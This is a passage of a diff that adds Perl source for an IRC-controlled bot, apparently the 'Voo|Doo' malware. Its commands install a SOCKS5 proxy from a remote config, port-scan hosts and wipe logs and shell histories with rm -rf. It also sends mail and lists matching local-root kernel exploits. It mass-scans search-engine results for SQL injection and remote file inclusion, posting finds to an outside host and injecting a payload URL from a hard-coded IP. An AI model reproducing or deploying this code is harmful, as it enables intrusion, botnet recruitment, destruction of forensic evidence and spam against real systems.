+	my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return; 
+	print $sock "GET /whatsnew20.xml HTTP/1.0\r\n";
+	print $sock "Host: www.packetstormsecurity.org\r\n";
+	print $sock "Accept: */*\r\n";
+	print $sock "User-Agent: Mozilla/5.0\r\n\r\n"; 
+	my @r = <$sock>;
+	$page="@r";
+	close($sock);
+	while ($page =~  m/<link>(.*)<\/link>/g)
+	{
+     		push(@ttt,$1);
+	}
+	while ($page =~  m/<description>(.*)<\/description>/g)
+	{ 
+    		push(@ttt1,$1);
+	}
+	foreach $x (0..(@ttt - 1))
+	{
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ".$ttt[$x]." ".$ttt1[$x]."");
+		sleep 3;
+		$c++;
+	}
+}
+######################
+#Auto Install Socks V5 using Mocks#
+######################
+if ($funcarg =~ /^socks5/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Installing Mocks please wait4");
+		system 'cd /tmp';
+		system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
+		system 'tar -xvfz mocks-0.0.2.tar.gz';
+		system 'rm -rf mocks-0.0.2.tar.gz';
+		system 'cd mocks-0.0.2';
+		system 'rm -rf mocks.conf';
+		system 'curl -O http://andromeda.covers.de/221/mocks.conf';
+		system 'touch mocks.log';
+		system 'chmod 0 mocks.log';
+			sleep(2);
+		system './mocks start';
+			sleep(4);
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Looks like its succesfully installed lets do the last things4	");
+
+		#lets grab ip
+		$net = `/sbin/ifconfig | grep 'eth0'`;
+		if (length($net))
+		{
+		$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
+		if (!length($net))
+		{
+		$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
+		}
+			if (length($net))
+		{
+			chop($net);
+			@netip = split/:/,$net;
+			$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
+			$ip = $1 .".". $2 .".". $3 .".". $4;
+			
+				#and print it ^^	
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Connect here ". $ip .":8787 ");
+			}
+		else
+	{
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] IP not founded ");
+	}
+}
+else
+{
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ERROR WHILE INSTALLING MOCKS ");
+}
+}
+######################
+#        Nmap        # 
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner);
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port Scan $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port-Scan: $porta"."/Open");
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port-Scan Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] No open ports have been founded ");
+             }
+          }
+######################
+#    End of Nmap     # 
+######################
+
+if ($funcarg =~ /^killproc\s+(\d+)/){
+
+		$proc=$1;
+		open(FILE,"/tmp/pids");
+		while(<FILE>) {
+			$_ =~ /(\d+)\s+(.*)/;
+			$childs{$1}=$2;
+		}
+		close(FILE);
+		if(defined $childs{$proc}) {
+			delproc($proc);
+			`kill -9 $proc`;
+			sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Zabijam proces [ $proc ]   ");
+		} else {
+			sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Niema takiego procesu ");
+		}
+}
+
+# wyswietla procesy skanowania
+if ($funcarg =~ /^procslist/){
+
+	open(FILE,"/tmp/pids");
+	while(<FILE>) {
+		$_ =~ /(\d+)\s+(.*)/;
+		$childs{$1}=$2;
+	}
+	close(FILE);
+	if(scalar keys %childs > 0) {
+		for $klucz (keys %childs) {
+				sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Proces [ $klucz ]  By [ $childs{$klucz} ]   "); 
+		}
+	} else {
+				sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Brak procesow"); 
+	}
+}
+
+######################
+#    Log Cleaner     # 
+######################
+if ($funcarg =~ /^logcleaner/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean.  This process can be long, just wait");
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+   system 'rm -rf /etc/wtmp';
+   system 'rm -rf /var/run/utmp';
+   system 'rm -rf /etc/utmp';
+   system 'rm -rf /var/log';
+   system 'rm -rf /var/logs';
+   system 'rm -rf /var/adm';
+   system 'rm -rf /var/apache/log';
+   system 'rm -rf /var/apache/logs';
+   system 'rm -rf /usr/local/apache/log';
+   system 'rm -rf /usr/local/apache/logs';
+   system 'rm -rf /root/.bash_history';
+   system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean.  All default log and bash_history files erased");
+      sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean.  Now Erasing the rest of the machine log files");
+   system 'find / -name *.bash_history -exec rm -rf {} \;';
+   system 'find / -name *.bash_logout -exec rm -rf {} \;';
+   system 'find / -name "log*" -exec rm -rf {} \;';
+   system 'find / -name *.log -exec rm -rf {} \;';
+      sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean.  Done! All logs erased");
+      }
+######################
+# End of Log Cleaner # 
+######################
+######################
+#              SQL SCANNER              #
+######################
+if ($funcarg =~ /^sql2\s+(.*?)\s+(.*)\s+(\d+)/){
+	if (my $pid = fork) {
+	waitpid($pid, 0);
+	} else {
+		if (my $d=fork()) {
+			addproc($d,"[SQL2] $2");
+			exit;
+		} else {
+						
+			my $bug=$1;
+			my $dork=$2;
+			my $contatore=0;
+			my ($type,$space);
+			my %hosts;
+			my $columns=$3;
+
+&Find($dork);
+	my @links = &GetLink();
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Stron : ".scalar(@links));
+	my @uni = &Unique(@links);
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Wyczyszczono : ".scalar(@uni));
+	&Remove();
+	 
+						foreach my $sito (@uni) {
+		  		
+						$contatore++;
+		  				if ($contatore==$uni-1){
+							sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]End: $bug $chiave ");
+		  				}	
+
+		  				my $site="http://".$sito.$bug;
+						#sendraw($IRC_cur_socket, "PRIVMSG $printl :Sprawdzam: $site cols: $columns ");
+			
+			$w=int rand(999);	
+			$w=$w*1000;
+			for($i=1;$i<=$columns;$i++) {
+				splice(@col,0,$#col+1);
+				for($j=1;$j<=$i;$j++) {
+					push(@col,$w+$j);
+				}	
+				$tmp=join(",",@col);
+				$test=$site."-1+UNION+SELECT+".$tmp."/*";
+				print $test."\n";
+				$result=&Query($test,"3");
+				$result =~ s/\/\*\*\///g;
+				$result =~ s/UNION([^(\*)]*)//g;
+				for($k=1;$k<=$i;$k++) {
+					$n=$w+$k;
+						if($result =~ /$n/){
+							splice(@col2,0,$#col2+1);
+								for($s=1;$s<=$i;$s++) {
+									push(@col2,$s); 
+								}
+							$tmp2=join(",",@col2);
+							$test2="+UNION+SELECT+".$tmp2."/*";
+							push @{$dane{$test2}},$k;
+						} 
+				}
+			}
+			for $klucz (keys %dane) {
+				foreach $i(@{$dane{$klucz}}) {
+					$klucz =~ s/$i/$i/;
+				}
+				$ssij = $site."-1".$klucz;
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ".$ssij." ");
+				my $ua = LWP::UserAgent->new();
+				$ua->agent('Mozilla/5.0');
+				my %form = ('sqlbug' => $ssij,);
+				my $response = $ua->post('http://showtime.boo.pl/index.php', \%form);
+		}
+			%dane=();
+			#sendraw($IRC_cur_socket, "PRIVMSG @zut :[Voo|Doo] End. ");			
+      		}
+		}
+	delproc($$);
+	exit;
+	}
+}
+}
+#######  SQL SCANNER  #########
+
+if ($funcarg =~ /^string\s+(.*)\s+http\:\/\/(.*?)\/(.*?)\s+(\d+)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (my $d=fork()) {
+addproc($d,"[String] $2");
+exit;
+} else {
+		$kto = $1;
+		$host = $2;
+		$skrypt = $3;
+		$czekac=$4;
+		
+		#http://ttl.ugu.pl/string/index.php
+		my $socke = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>"80",Proto=>"tcp") or return;
+	   print $socke "GET /$skrypt HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	   
+		my @r = <$socke>;
+		$page="@r";
+	
+		$page =~ s/!scan(\s+)//g;
+		$page =~ s/!scan(.)//g;
+		$page =~ s/\<.*\>//g;
+		
+		@lines = split (/\n/, $page);
+		$ile=scalar(@lines);
+				
+		
+		for($i=9;$i<=$ile;$i+=4) {
+
+			for($j=0;$j<4;$j++) {
+				#print $lines[$i+$j]."\n";
+				
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :$kto $lines[$i+$j]");
+				
+				sleep 10;
+			}
+			
+			sleep $czekac*60;
+		}
+
+	}
+		delproc($$);
+		exit;
+	}
+}
+
+
+
+
+
+#######  SQL SCANNER  #########
+
+if ($funcarg =~ /^sql\s+(.*)\s+(\d+)/){
+	if (my $pid = fork()) {
+		waitpid($pid, 0);
+	} else {
+		if (my $d=fork()) {
+			addproc($d,"[SQL1] $1 $2");
+			exit;
+		} else {
+			my $site=$1;
+			my $columns=$2;
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql [Testing]: $site cols:  $columns ");
+			
+			$w=int rand(999);	
+			$w=$w*1000;
+			for($i=1;$i<=$columns;$i++) {
+				splice(@col,0,$#col+1);
+				for($j=1;$j<=$i;$j++) {
+					push(@col,$w+$j);
+				}	
+				$tmp=join(",",@col);
+				$test=$site.$bug."-1'+UNION+SELECT+".$tmp."/*";
+								#$result=query($test);
+				$result=get_html($test);
+	
+				$result =~ s/\/\*\*\///g;
+				$result =~ s/UNION([^(\*)]*)//g;
+				for($k=1;$k<=$i;$k++) {
+					$n=$w+$k;
+						if($result =~ /$n/){
+							splice(@col2,0,$#col2+1);
+								for($s=1;$s<=$i;$s++) {
+									push(@col2,$s); 
+								}
+							$tmp2=join(",",@col2);
+							$test2="+UNION+SELECT+".$tmp2."/*";
+							push @{$dane{$test2}},$k;
+						} 
+				}
+			}
+			for $klucz (keys %dane) {
+				foreach $i(@{$dane{$klucz}}) {
+					$klucz =~ s/$i/$i/;
+				}
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql [Sql-Bug]:  ".$site.$bug."-1".$klucz." ");
+			}
+		#	sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ sql ] [ 12Koniec 4 ] ");		
+		}
+	delproc($$);
+	exit;
+	}
+}
+#######  SQL SCANNER  #########
+######################
+#        Rootable                                     #
+######################
+if ($funcarg =~ /^rootable/) { 
+my $khost = `uname -r`;
+my $currentid = `whoami`;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Currently you are ".$currentid." ");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] The kernel of this box is ".$khost." ");
+chomp($khost);
+
+	my %h;
+	$h{'w00t'} = { 
+		vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] 
+	};
+	
+	$h{'brk'} = {
+		vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] 
+	};
+	
+	$h{'ave'} = {
+		vuln=>['2.4.19','2.4.20'] 
+	};
+	
+	$h{'elflbl'} = {
+		vuln=>['2.4.29'] 
+	};
+	
+	$h{'elfdump'} = {
+		vuln=>['2.4.27']
+	};
+	
+	$h{'expand_stack'} = {
+		vuln=>['2.4.29'] 
+	};
+	
+	$h{'h00lyshit'} = {
+		vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
+	};
+	
+	$h{'kdump'} = {
+		vuln=>['2.6.13'] 
+	};
+	
+	$h{'km2'} = {
+		vuln=>['2.4.18','2.4.22']
+	};
+	
+	$h{'krad'} = {
+		vuln=>['2.6.11']
+	};
+	
+	$h{'krad3'} = {
+		vuln=>['2.6.11','2.6.9']
+	};
+	
+	$h{'local26'} = {
+		vuln=>['2.6.13']
+	};
+	
+	$h{'loko'} = {
+		vuln=>['2.4.22','2.4.23','2.4.24'] 
+	};
+	
+	$h{'mremap_pte'} = {
+		vuln=>['2.4.20','2.2.25','2.4.24'] 
+	};
+	
+	$h{'newlocal'} = {
+		vuln=>['2.4.17','2.4.19','2.4.18'] 
+	};
+	
+	$h{'ong_bak'} = {
+		vuln=>['2.4.','2.6.'] 
+	};
+	
+	$h{'ptrace'} = {
+		vuln=>['2.2.','2.4.22'] 
+	};
+	
+	$h{'ptrace_kmod'} = {
+		vuln=>['2.4.2'] 
+	};
+	
+	$h{'ptrace24'} = {
+		vuln=>['2.4.9'] 
+	};
+	$h{'pwned'} = {
+		vuln=>['2.4.','2.6.'] 
+	};
+	$h{'py2'} = {
+		vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] 
+	};
+	$h{'raptor_prctl'} = {
+		vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] 
+	};
+	$h{'prctl3'} = {
+		vuln=>['2.6.13','2.6.17','2.6.9'] 
+	};
+	$h{'remap'} = {
+		vuln=>['2.4.'] 
+	};
+	$h{'rip'} = {
+		vuln=>['2.2.'] 
+	};
+	$h{'stackgrow2'} = {
+		vuln=>['2.4.29','2.6.10'] 
+	};
+	$h{'uselib24'} = {
+		vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] 
+	};
+	$h{'newsmp'} = {
+		vuln=>['2.6.'] 
+	};
+	$h{'smpracer'} = {
+		vuln=>['2.4.29'] 
+	};
+	$h{'loginx'} = {
+		vuln=>['2.4.22'] 
+	};
+	$h{'exp.sh'} = {
+		vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] 
+	};
+	$h{'prctl'} = {
+		vuln=>['2.6.'] 
+	};
+	$h{'kmdx'} = {
+		vuln=>['2.6.','2.4.'] 
+	};
+	$h{'raptor'} = {
+		vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 
+	};
+	$h{'raptor2'} = {
+		vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 
+	};
+foreach my $key(keys %h){
+foreach my $kernel ( @{ $h{$key}{'vuln'} } ){ 
+	if($khost=~/^$kernel/){
+	chop($kernel) if ($kernel=~/.$/);
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Possible Local Root Exploits: ". $key ." ");
+		}
+	}
+}
+}
+######################
+#       MAILER       # 
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Mailer |  Sending Mail to : 2 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3;
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n";
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Mailer |  Mail Sent To : 2 $recipient");
+}
+######################
+#   End of MAILER    # 
+######################
+my $responselfi = "./../../../../../../../../etc/passwd";
+my $printcmdlfi = "./../../../../../../../../etc/passwd";
+
+if ($funcarg =~ /^auto\s+(.*?)\s+(.*)/){
+	if(fork() == 0){
+if (my $d=fork()) {
+addproc($d,"[Autoscan] $2");
+exit;
+}
+		my($bug,$dork)=($1,$2);
+		&autoscan($bug,$dork);
+			delproc($$);
+			exit(0);
+	}
+}
+
+sub autoscan(){
+	my @domini = &SiteDomains();
+	my($bug,$dork)=@_;
+	$dork =~ s/[\r\n]//g;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Scan Start ".$dork);
+	if($dork =~ /site:/){
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Zakazany Dork.");
+		exit(0);
+	}
+	foreach my $Domains(@domini){
+		my $auto_dork = $dork."+site:".$Domains;
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Skanuje :".$auto_dork);
+		&Find($auto_dork);
+		&Test($bug);
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Scan End: ".$dork);
+	}
+}
+sub Find(){
+	my $dork = $_[0];
+	my @proc;
+	$proc[0] = fork();
+	if($proc[0] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Google : ".scalar(&Google($dork)));
+		exit;
+	}
+	$proc[1] = fork();
+	if($proc[1] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Yahoo : ".scalar(&Yahoo($dork)));
+		exit;
+	}
+	$proc[2] = fork();
+	if($proc[2] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Baidu : ".scalar(&baidu($dork)));
+		exit;
+	}
+	$proc[3] = fork();
+	if($proc[3] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Gigablast : ".scalar(&Gigablast($dork)));
+		exit;
+	}
+	$proc[4] = fork();
+	if($proc[4] == 0){
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Msn : ".scalar(&MSN($dork)));
+		exit;
+	}
+	$proc[5] = fork();
+	if($proc[5] == 0){
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Aol : ".scalar(&Aol($dork)));
+		exit;
+	}
+	$proc[6] = fork();
+	if($proc[6] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] AltaVista :  ".scalar(&AltaVista($dork)));
+		exit;
+	}
+	$proc[7] = fork();
+	if($proc[7] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Alltheweb : ".scalar(&Alltheweb($dork)));
+		exit;
+	}
+	$proc[8] = fork();
+	if($proc[8] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Fireball : ".scalar(&fire($dork)));
+		exit;
+	}
+	$proc[9] = fork();
+	if($proc[9] == 0){
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Uol : ".scalar(&UOL($dork)));
+		exit;
+	}
+
+	waitpid($proc[0],0);
+	waitpid($proc[1],0);
+	waitpid($proc[2],0);
+	waitpid($proc[3],0);
+	waitpid($proc[4],0);
+	waitpid($proc[5],0);
+	waitpid($proc[6],0);
+	waitpid($proc[7],0);
+	waitpid($proc[8],0);
+	waitpid($proc[9],0);
+}
+sub Test(){
+	my $counter = 0;
+	my $bug = $_[0];
+	my @links = &GetLink();
+	my $test = "http://201.218.196.231/fastspread.txt?";
+	my $response = "http://201.218.196.231/fastspread.txt?";
+	my $printcmd = "RFI?";
+	my @forks;
+	my $forked++;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Stron : ".scalar(@links));
+	my @uni = &Unique(@links);
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Wyczyszczono : ".scalar(@uni));
+	&Remove();
+	my $testx = scalar(@uni);
+	my $startx = 0;
+	foreach my $site (@uni){
+		$counter++;
+		my $link = "http://".$site.$bug.$test."?";
+		my $responser = "http://".$site.$bug.$response."?";
+		print($link."\n"); # Prints test links in terminal
+		if($counter %$exploitcounter == 0){
+			my $start = 0;
+			foreach my $f(@forks){
+				waitpid($f,0);
+				$forks[$start--];
+				$start++;
+			}
+			$startx = 0;
+		}
+		$forks[$startx]=fork();
+		if($forks[$startx] == 0){
+			my $htmlsite = &Query($link,"3");
+			if($htmlsite =~ /kangkung/){
+				my $responsing = &Query($responser,"3");
+					if($responsing =~ /kangkung/){
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Safe Off :  "."http://".$site.$bug.$printcmd);
+			}}
+			elsif($htmlsite =~ /kangkung/){
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Safe Onn : "."http://".$site.$bug.$printcmd);
+			}
+			exit(0);
+		}
+		if($counter %150 == 0){
+		#	&message($channel,"BanTeNHacK SabaR.. lg NyaRi 12kNd 3->  ".$counter." dari ".$testx);
+		}
+		$startx++;
+	}
+	my $start = 0;
+	foreach my $f(@forks){
+		waitpid($f,0);
+		$forks[$start--];
+		$start++;
+	}
+}
+sub SiteDomains(){
+	my @dom = (
+			"de","nl","be","dk","sk","com","net","org",
+			"info","uk","se","it","fr","hu","pl","ru",
+			"ro","be","cz","edu","jp"
+		  );
+} 
+
+sub Google(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my @dom = &GoogleDomains();
+	my $file = "/tmp/google.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		my $Domains = $dom[rand(scalar(@dom))];
+		$html.=&Query("http://www.google.".$Domains."/search?q=".$dork."&num=".$num."&sa=N&filter=0&start=".$start);
+	}
+	while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"\ class/g){
+		$1 =~ /google/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Yahoo(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my $file = "/tmp/yahoo.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start);
+	}
+	while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){
+		$1 =~ /yahoo/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+
+
+
+sub baidu(){
+my @lst;
+my $key = $_[0];
+my $pg = 0;
+    for($i=0; $i<=1000; $i+=10){
+my $lib=("http://www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=".key($key)."&pn=".$start."&ver=0&cl=3");
+my $Res=query($lib);
+while($Res =~ m/href=\"http:\/\/(.*?)\"/ig){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+
+sub Alltheweb(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my $file = "/tmp/alltheweb.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
+	}
+	while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){
+		$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+
+sub UOL(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=20;
+	my $max=100*10;
+	my $file = "/tmp/UOL.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://busca.uol.com.br/www/index.html?q=".$dork."&start=".$start);
+	}
+	while($html =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+		$1 =~ /busca|uol|yahoo/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub fire(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=10;
+	my $max=100*10;
+	my $file = "/tmp/fire.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://suche.fireball.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&cat=fb_loc&idx=all&enc=utf-8");
+	}
+	while($html =~ m/<a href=\"?http:\/\/(.+?)\//g){
+		$1 =~ /msn|live|google|yahoo/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub MSN(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=10;
+	my $max=100*10;
+	my $file = "/tmp/msn.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://search.live.com/results.aspx?q=".$dork."&first=".$start."&FORM=PERE");
+	}
+	while($html =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+		$1 =~ /msn|live/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+
+sub Query(){
+	my($link,$timeout)=@_;
+	my $req=HTTP::Request->new(GET=>$link);
+	my $ua=LWP::UserAgent->new();
+	$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
+	$ua->timeout($timeout);
+	my $response=$ua->request($req);
+	return $response->content;
+}
+
+sub Key(){
+	my $key=$_[0];
+	$key =~ s/ /\+/g;
+	$key =~ s/:/\%3A/g;
+	$key =~ s/\//\%2F/g;
+	$key =~ s/&/\%26/g;
+	$key =~ s/\"/\%22/g;
+	$key =~ s/\\/\%5C/g;
+	$key =~ s/,/\%2C/g;
+	return $key;
+}
+
+sub GetLink(){
+		my @file = ("/tmp/google.txt","/tmp/yahoo.txt","/tmp/abacho.txt","/tmp/gigablast.txt","/tmp/msn.txt","/tmp/virgilio.txt","/tmp/seekport.txt","/tmp/alltheweb.txt","/tmp/aol.txt","/tmp/UOL.txt","/tmp/fire.txt");
+	my $link;
+	my @total;
+	foreach my $n (@file){
+		open(F,'<',$n);
+		while($link = <F>){
+			$link=~s/[\r\n]//g;
+			push(@total,$link);
+		}
+		close(F);
+	}
+	return(@total);
+}
+
+sub Remove(){
+	my @file = ("/tmp/google.txt","/tmp/yahoo.txt","/tmp/abacho.txt","/tmp/gigablast.txt","/tmp/msn.txt","/tmp/virgilio.txt","/tmp/seekport.txt","/tmp/alltheweb.txt","/tmp/aol.txt","/tmp/UOL.txt","/tmp/fire.txt");
+	foreach my $n (@file){
+		system("rm -rf ".$n);
+	}
+}
+sub GoogleDomains(){
+	my @ret = (
+			"ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
+			"ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
+			"com.tr","com.tw","com.ua","co.uk","hu"
+		  );
+	return(@ret);
+}
+sub Unique{
+	my @Unique = ();
+	my %seen = ();
+	foreach my $element ( @_ ){
+		next if $seen{ $element }++;
+		push @Unique, $element;
+	}
+	return @Unique;
+}
+sub Links(){
+	my ($link,$file_print) = @_;
+	$link=~s/http:\/\///g;
+	my $host = $link;
+	my $host_dir = $host;
+	my @links;
+	$host_dir=~s/(.*)\/[^\/]*$/\1/;
+	$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+	$host_dir=&End($host_dir);
+	$host=&End($host);
+	$link=&End($host);
+	push(@links,$link,$host,$host_dir);
+	open($file,'>>',$file_print);
+	print $file "$link\n$host_dir\n$host\n";
+	close($file);
+	return @links;
+}
+sub End(){
+	$string=$_[0];
+	$string.="/";
+	$string=~s/\/\//\//;
+	while($string=~/\/\//){
+		$string=~s/\/\//\//;
+	}
+	return($string);
+}
+
+sub Agent(){
+	my @ret = (
+	"Microsoft Internet Explorer/4.0b1 (Windows 95)",
+	"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
+	"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
+	"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
+	"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
+	"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
+	"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
+	"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
+	"Microsoft Pocket Internet Explorer/0.6",
+	"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
